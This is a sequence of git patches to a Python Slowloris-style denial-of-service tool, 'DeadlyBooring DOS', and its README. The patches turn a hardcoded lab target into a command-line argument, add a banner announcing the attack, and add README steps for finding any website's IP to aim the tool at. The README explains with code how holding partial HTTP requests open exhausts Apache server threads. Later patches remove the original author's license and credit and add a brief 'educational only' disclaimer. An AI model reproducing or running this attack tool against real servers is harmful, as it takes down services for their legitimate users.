From 8b0df601114ebfee30695d67d376850d8547923e Mon Sep 17 00:00:00 2001 From: VirusZzHkP Date: Tue, 13 Sep 2022 11:52:20 +0530 Subject: [PATCH 1/8] added_user_input_module --- DeadlyBooringDOS.py | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) diff --git a/DeadlyBooringDOS.py b/DeadlyBooringDOS.py index 7e50cfa..96d2f3a 100644 --- a/DeadlyBooringDOS.py +++ b/DeadlyBooringDOS.py @@ -41,6 +41,19 @@ def attack(self, timeout=sys.maxsize, sleep=15): time.sleep(sleep/len(self._sockets)) + if __name__ == "__main__": - dos = DeadlyBooring("192.168.0.236", 81, socketsCount=200) - dos.attack(timeout=60*10) \ No newline at end of file + try: + ipaddr = sys.argv[1] + except IndexError: + sys.exit(""" +----------------------------------------------------------------------- +----------------------------------------------------------------------- + Please specify an IP address to run. +Usage: python3 DeadlyBooringDOS.py +----------------------------------------------------------------------- +----------------------------------------------------------------------- + """) + print("Please wait the attack is cooking!") + dos = DeadlyBooring(ipaddr, 80, socketsCount=200) + dos.attack(timeout=60*10) From 182db1c0d1087886ddd451148ad3ca932b4e45a6 Mon Sep 17 00:00:00 2001 From: VirusZzHkP Date: Tue, 13 Sep 2022 12:28:30 +0530 Subject: [PATCH 2/8] added how to use the tool --- README.md | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/README.md b/README.md index b928ac1..c4dc7d4 100644 --- a/README.md +++ b/README.md @@ -85,6 +85,15 @@ ipconfig ``` which will give you your local IP-Address (lets assume here that the devices IP is 192.168.0.33). Test the connection to your second device via typing "192.168.0.33:80" into your browser, letting you directly access the webpage you created on your second device. If you see nothing, make sure both devices are connected to the same router, your WAMP is running and no firewall is blocking the access. Otherwise, make sure that in the WAMP httpd_config file, you set the restrictions to LOCAL (google for further instructions). If it works, try calling DeadlyBooring on the same IP on Port 80. Refresh your page and you will see that you will get no response from the server (note that the website may be cashed, so you will sill see the page). +## Usage +In order to run `DeadlyBooringDOS.py` + + +Write the command as: +``` +python3 DeadlyBooringDOS.py +``` + License ---- From 966f2e951949e5601e8901f1c5e6c3de7d894fd7 Mon Sep 17 00:00:00 2001 From: VirusZzHkP Date: Tue, 13 Sep 2022 12:40:23 +0530 Subject: [PATCH 3/8] made it look good --- DeadlyBooringDOS.py | 18 +++++++++++++++++- 1 file changed, 17 insertions(+), 1 deletion(-) diff --git a/DeadlyBooringDOS.py b/DeadlyBooringDOS.py index 96d2f3a..32af989 100644 --- a/DeadlyBooringDOS.py +++ b/DeadlyBooringDOS.py @@ -54,6 +54,22 @@ def attack(self, timeout=sys.maxsize, sleep=15): ----------------------------------------------------------------------- ----------------------------------------------------------------------- """) - print("Please wait the attack is cooking!") + mstr=""" + + ( ( ) ( + )\ ) ( ( ( )\ ) ( /( )\ ) + (()/( ( ) )\ ) )\ ( ( )\ ( ( ( ( (()/( )\()) (()/( + /(_)) ))\ ( /( (()/(((_))\ ) )((_) ( ( )( )\ ( )\))( /(_)) ((_)\ /(_)) + (_))_ /((_))(_)) ((_))_ (()/(((_)_ )\ )\ (()\((_) )\ ) ((_))\(_))_ ((_) (_)) + | \ (_)) ((_)_ _| || | )(_))| _ ) ((_) ((_) ((_)(_) _(_/( (()(_)| \ / _ \ / __| + | |) |/ -_)/ _` |/ _` || || || || _ \/ _ \/ _ \| '_|| || ' \))/ _` | | |) || (_) |\__ \ + |___/ \___|\__,_|\__,_||_| \_, ||___/\___/\___/|_| |_||_||_| \__, | |___/ \___/ |___/ + |__/ |___/ + + Please wait the attack is cooking! + """ + for x in mstr.splitlines(): + print(x) + time.sleep(0.5) dos = DeadlyBooring(ipaddr, 80, socketsCount=200) dos.attack(timeout=60*10) From 509404c6ec0027a97343e91b9a5b5c786fdb35ce Mon Sep 17 00:00:00 2001 From: VirusZzHkP Date: Tue, 13 Sep 2022 12:49:47 +0530 Subject: [PATCH 4/8] added more usage details --- README.md | 47 +++++++++++++++++++++++++++++++++++------------ 1 file changed, 35 insertions(+), 12 deletions(-) diff --git a/README.md b/README.md index c4dc7d4..37da84d 100644 --- a/README.md +++ b/README.md @@ -1,26 +1,32 @@ # Deadly Booring DOS -Denial of Service attacks do not always have to flood the server with requests to make him shut down. Deadly Booring DOS takes a much more elegant appraoch: Instead sending as much data as possible, we send as little data as we can. +Denial of Service attacks do not always have to flood the server with requests to make him shut down. Deadly Booring DOS takes a much more elegant appraoch: Instead sending as much data as possible, we send as little data as we can. DeadlyBooring is a free interpretation of SlowLoris DOS. ### *Preface* + Deadly Booring DOS was purely written for educational researches. I am going to explain how you can set up a simple appache website on one of your old machines that you can use to test DeadlyBooring. Never run such an attack against IP addresses that are not under your control. Never abuse the script to harm anybody. You got your own responsibility. # The Idea -DeadlyBoorig DOS looks at DOS attacks from a different perspective. To understand how it works, we first need to understand internet protocols in general. What our browser is doing when we enter *http://www.github.com* is sending a HTTP GET Request to the IP address of the github servers (which is *192.30.253.113*, by the way) to the port 80, which is usually used to serve HTTP Requests. Such a HTTP GET request may say *"Please give me the /joelbarmettlerUZH/DeadlyBooring_DOS site"*, to which the github servers will respond with the corresponding HTML file. + +DeadlyBoorig DOS looks at DOS attacks from a different perspective. To understand how it works, we first need to understand internet protocols in general. What our browser is doing when we enter ** is sending a HTTP GET Request to the IP address of the github servers (which is *192.30.253.113*, by the way) to the port 80, which is usually used to serve HTTP Requests. Such a HTTP GET request may say *"Please give me the /joelbarmettlerUZH/DeadlyBooring_DOS site"*, to which the github servers will respond with the corresponding HTML file. ## HTTP GET Requests +--- -The normal usage of such GET requests is to just type an URL into your browser, which then asks the DNS server to convert github.com into an IP and formulates the right GET request for all the content that needs to be displayed, such as images and scripts. The browser asks for data - the server responds - done. +The normal usage of such GET requests is to just type an URL into your browser, which then asks the DNS server to convert github.com into an IP and formulates the right GET request for all the content that needs to be displayed, such as images and scripts. The browser asks for data - the server responds - done. -The interesting thing is that such HTTP GET requests follow a well defined schema: They start with the content the browser is asking for, followed by the used Protocol *(HTTP/1.1)*, ended with two line-break characters \n\n. As long as the server does not retreive these two newline characters, he is waiting for more data to come, thinking the browser has a temporary internet loss or simply a slow connection. Eventually, when the server does not hear anything from the browser for a bunch of seconds, he drops the connection to the browser again. This is quiet a normal behaviour. +The interesting thing is that such HTTP GET requests follow a well defined schema: They start with the content the browser is asking for, followed by the used Protocol *(HTTP/1.1)*, ended with two line-break characters \n\n. As long as the server does not retreive these two newline characters, he is waiting for more data to come, thinking the browser has a temporary internet loss or simply a slow connection. Eventually, when the server does not hear anything from the browser for a bunch of seconds, he drops the connection to the browser again. This is quiet a normal behaviour. ## Apache Servers -DeadlyBooring DOS is now making use of this server behaviours: Most of the internet servers (arround 50%) run on apache, an open source HTTP Server Project. Appache is built in a way that the server opens a new Thread for every user that is requesting content, answering his requests until it is done. A small server only has a limited amount of such threads he can have opened simultaniously - meaning he can only serve a limited amount of users at once. Normally, this is no problem at all, since small websites rarely have several hundret users that want to make a request to the werbserver in the same second. What DeadlyBooring DOS does is opening up connections to all threads on the appache webserver and making an unfinished HTTP GET Request every few seconds, which makes the thread wait for more data and therefore prevents the webserver from closing the connection. This means that we pretend to be several hundret users with a deadly slow internet connection, making the whole server wait for data to come, but we will never finish sending our incomplete requests every few seconds. +--- + +DeadlyBooring DOS is now making use of this server behaviours: Most of the internet servers (arround 50%) run on apache, an open source HTTP Server Project. Appache is built in a way that the server opens a new Thread for every user that is requesting content, answering his requests until it is done. A small server only has a limited amount of such threads he can have opened simultaniously - meaning he can only serve a limited amount of users at once. Normally, this is no problem at all, since small websites rarely have several hundret users that want to make a request to the werbserver in the same second. What DeadlyBooring DOS does is opening up connections to all threads on the appache webserver and making an unfinished HTTP GET Request every few seconds, which makes the thread wait for more data and therefore prevents the webserver from closing the connection. This means that we pretend to be several hundret users with a deadly slow internet connection, making the whole server wait for data to come, but we will never finish sending our incomplete requests every few seconds. -While the server has all its threads dedicated to our script, the webserver will not answer any other GET requests from other users, since he is busy waiting for our nonsense data. Meanwhile, our computer barely needs any computing power since all we do is sending several hundrets tiny small data packages to a server every second - which is by no means a task you would even recognize running in your background. +While the server has all its threads dedicated to our script, the webserver will not answer any other GET requests from other users, since he is busy waiting for our nonsense data. Meanwhile, our computer barely needs any computing power since all we do is sending several hundrets tiny small data packages to a server every second - which is by no means a task you would even recognize running in your background. # The Code + The code is fairly simple and just under 50 lines. First, we create the DeadlyBooring class and provide it with information about to what IP we would like to lead our attack to, as well as the Port (80 is the standard port for webserver) and the number of parallel connections that we want to establish. Lastly, we fake some HTTP GET header information to make our requests plausible to the server. ```python @@ -35,6 +41,7 @@ class DeadlyBooring(): ``` ## Create sockets +--- Next, we want to create our sockets. We define a method that connects a new websocket with the dedicated protocol types to the IP and Port that we specified. We send him a first GET request and the HTTP header information. Some error handling ensures that an error would not lead the DOS to stop but would just try creating a new socket instead. @@ -61,9 +68,11 @@ self._sockets = [self.newSocket() for _ in range(socketsCount)] ``` ## Attack-method -Now let's finally write the attack method. It is actually really simple: For all sockets, we send a get request with the *X-a* header field, keeping the request open and making the server wait for the rest of the data. After each sent request, we wait vor a short period of time before sending the next one, with making sure that every socket sends data at least once every couple of seconds so that the connection is not lost. Every lost socket is immediatelly replaced with a new one taking its place, guaranteeing that free server threads are populated again. +--- + +Now let's finally write the attack method. It is actually really simple: For all sockets, we send a get request with the *X-a* header field, keeping the request open and making the server wait for the rest of the data. After each sent request, we wait vor a short period of time before sending the next one, with making sure that every socket sends data at least once every couple of seconds so that the connection is not lost. Every lost socket is immediatelly replaced with a new one taking its place, guaranteeing that free server threads are populated again. -```python +```python def attack(self, timeout=sys.maxsize, sleep=15): t, i = time.time(), 0 while(time.time() - t < timeout): @@ -79,22 +88,36 @@ Now let's finally write the attack method. It is actually really simple: For all ``` # Testing -In order to test our code, we need to create a protected environment, since we can not just start a DOS attack on some server that we do not own. As a simple option, you can use some old hardware and run [wamp](http://www.wampserver.com/en/) on it. Install and run WAMPServer on your second device and test the connection by visiting [localhost:80](localhost:80), which should give you the default wamp interface, indicating that your server is running. If you want to go fancy, create a simple HTML file in the *www* directory where you installed whamp. Now open the command promt on your second device and run + +In order to test our code, we need to create a protected environment, since we can not just start a DOS attack on some server that we do not own. As a simple option, you can use some old hardware and run [wamp](http://www.wampserver.com/en/) on it. Install and run WAMPServer on your second device and test the connection by visiting [localhost:80](localhost:80), which should give you the default wamp interface, indicating that your server is running. If you want to go fancy, create a simple HTML file in the *www* directory where you installed whamp. Now open the command promt on your second device and run + ```sh ipconfig ``` -which will give you your local IP-Address (lets assume here that the devices IP is 192.168.0.33). Test the connection to your second device via typing "192.168.0.33:80" into your browser, letting you directly access the webpage you created on your second device. If you see nothing, make sure both devices are connected to the same router, your WAMP is running and no firewall is blocking the access. Otherwise, make sure that in the WAMP httpd_config file, you set the restrictions to LOCAL (google for further instructions). If it works, try calling DeadlyBooring on the same IP on Port 80. Refresh your page and you will see that you will get no response from the server (note that the website may be cashed, so you will sill see the page). + +which will give you your local IP-Address (lets assume here that the devices IP is 192.168.0.33). Test the connection to your second device via typing "192.168.0.33:80" into your browser, letting you directly access the webpage you created on your second device. If you see nothing, make sure both devices are connected to the same router, your WAMP is running and no firewall is blocking the access. Otherwise, make sure that in the WAMP httpd_config file, you set the restrictions to LOCAL (google for further instructions). If it works, try calling DeadlyBooring on the same IP on Port 80. Refresh your page and you will see that you will get no response from the server (note that the website may be cashed, so you will sill see the page). ## Usage -In order to run `DeadlyBooringDOS.py` +--- +In order to run `DeadlyBooringDOS.py` Write the command as: + ``` python3 DeadlyBooringDOS.py ``` -License +To get ip address of any website, just open a `terminal` and type: + + ``` + ping website.com +``` + +You will get the website ip, just copy it and paste it. + + +## License ---- MIT License From 993f91dd441baa4ec4cd575e3b858048912ac421 Mon Sep 17 00:00:00 2001 From: Hrisikesh <76624193+VirusZzHkP@users.noreply.github.com> Date: Sat, 15 Oct 2022 11:39:33 +0530 Subject: [PATCH 5/8] Update README.md --- README.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 37da84d..1cfb2ab 100644 --- a/README.md +++ b/README.md @@ -142,4 +142,6 @@ LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. -Hire us: [Software Entwickler in Zürich](https://polygon-software.ch)! +--- + +VirusZzWarning ♥ From 0aefe27af240bf075fb8783a0a3c7a7b78372d4c Mon Sep 17 00:00:00 2001 From: Hrisikesh <76624193+VirusZzHkP@users.noreply.github.com> Date: Wed, 4 Jan 2023 15:11:27 +0530 Subject: [PATCH 6/8] Update README.md --- README.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/README.md b/README.md index 1cfb2ab..5dc5683 100644 --- a/README.md +++ b/README.md @@ -3,6 +3,11 @@ Denial of Service attacks do not always have to flood the server with requests to make him shut down. Deadly Booring DOS takes a much more elegant appraoch: Instead sending as much data as possible, we send as little data as we can. DeadlyBooring is a free interpretation of SlowLoris DOS. +## Disclaimer: + +### This tool is made for Educational purpose only. Don't use it for ILLEGAL Activities. You are responsible for your Actions. + + ### *Preface* Deadly Booring DOS was purely written for educational researches. I am going to explain how you can set up a simple appache website on one of your old machines that you can use to test DeadlyBooring. Never run such an attack against IP addresses that are not under your control. Never abuse the script to harm anybody. You got your own responsibility. From 3ecb12ae4a3970e77e598ef0d89e69e74fe30d53 Mon Sep 17 00:00:00 2001 From: Hrisikesh <76624193+VirusZzHkP@users.noreply.github.com> Date: Wed, 24 Jul 2024 16:35:43 +0530 Subject: [PATCH 7/8] Update README.md --- README.md | 27 --------------------------- 1 file changed, 27 deletions(-) diff --git a/README.md b/README.md index 5dc5683..e90fcc2 100644 --- a/README.md +++ b/README.md @@ -122,31 +122,4 @@ To get ip address of any website, just open a `terminal` and type: You will get the website ip, just copy it and paste it. -## License ----- - -MIT License - -Copyright (c) 2018 Joel Barmettler - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. - ---- - VirusZzWarning ♥ From 09223974862525b704cff04db487db9030406f4e Mon Sep 17 00:00:00 2001 From: Hrisikesh <76624193+VirusZzHkP@users.noreply.github.com> Date: Wed, 24 Jul 2024 16:37:49 +0530 Subject: [PATCH 8/8] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index e90fcc2..958e05b 100644 --- a/README.md +++ b/README.md @@ -14,7 +14,7 @@ Deadly Booring DOS was purely written for educational researches. I am going to # The Idea -DeadlyBoorig DOS looks at DOS attacks from a different perspective. To understand how it works, we first need to understand internet protocols in general. What our browser is doing when we enter ** is sending a HTTP GET Request to the IP address of the github servers (which is *192.30.253.113*, by the way) to the port 80, which is usually used to serve HTTP Requests. Such a HTTP GET request may say *"Please give me the /joelbarmettlerUZH/DeadlyBooring_DOS site"*, to which the github servers will respond with the corresponding HTML file. +DeadlyBoorig DOS looks at DOS attacks from a different perspective. To understand how it works, we first need to understand internet protocols in general. What our browser is doing when we enter ** is sending a HTTP GET Request to the IP address of the github servers (which is *192.30.253.113*, by the way) to the port 80, which is usually used to serve HTTP Requests. Such a HTTP GET request may say *"Please give me the /VirusZzHkP/DeadlyBooring_DOS site"*, to which the github servers will respond with the corresponding HTML file. ## HTTP GET Requests ---